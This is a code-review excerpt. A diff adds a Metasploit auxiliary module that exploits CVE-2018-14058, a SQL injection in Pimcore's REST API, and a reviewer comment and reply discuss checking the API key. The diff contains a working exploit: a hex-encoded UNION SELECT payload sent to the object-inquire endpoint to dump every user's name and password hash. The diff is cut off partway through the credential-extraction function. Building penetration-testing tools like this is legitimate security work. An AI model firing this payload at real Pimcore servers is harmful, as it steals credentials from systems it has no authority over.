modules/auxiliary/sqli/oracle/pimcore_list_creds.rb

```diff
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Pimcore List Credentials',
+      'Description'    => %q{
+        This module extracts the usernames and hashed passwords of all users of the Pimcore web service by exploiting a SQL injection vulnerability in Pimcore's REST API.
+      },
+      'Author'         => [ 'Thongchai Silpavarangkura', # PoC
+                            'N. Rai-Ngoen',              # PoC
+                            'Shelby Pace'                # Metasploit Module
+                          ],
+      'License'        => MSF_LICENSE,
+      'References'     => [
+                            [ 'CVE', '2018-14058' ],
+                            [ 'EDB', '45208' ]
+                          ],
+      'DisclosureDate' => 'Aug 13, 2018'
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The base path to pimcore', '/' ]),
+        OptString.new('APIKEY', [ true, 'The valid API key for Pimcore REST API', '' ])
+      ])
+  end
+
+  def available?
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(target_uri.path)
+    )
+
+    false unless res && res.body.include?('pimcore')
+
+    true
+  end
+
+  def get_creds
+    api_uri = "/webservice/rest/object-inquire?apikey=#{datastore['APIKEY']}&id="
+    api_uri = normalize_uri(target_uri.path, api_uri)
+    cmd = '1) UNION ALL SELECT CONCAT(name," ",password) from users#'
+    cmd = Rex::Text.uri_encode(cmd, 'hex-all')
+
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  api_uri << cmd
+    )
+
+    unless res and res.body.include?('"success":true')
```

Comment:
Is it possible to check whether the supplied API key is valid, and fail with `NoAccess` if it's invalid?

Reply:
There is! Thank you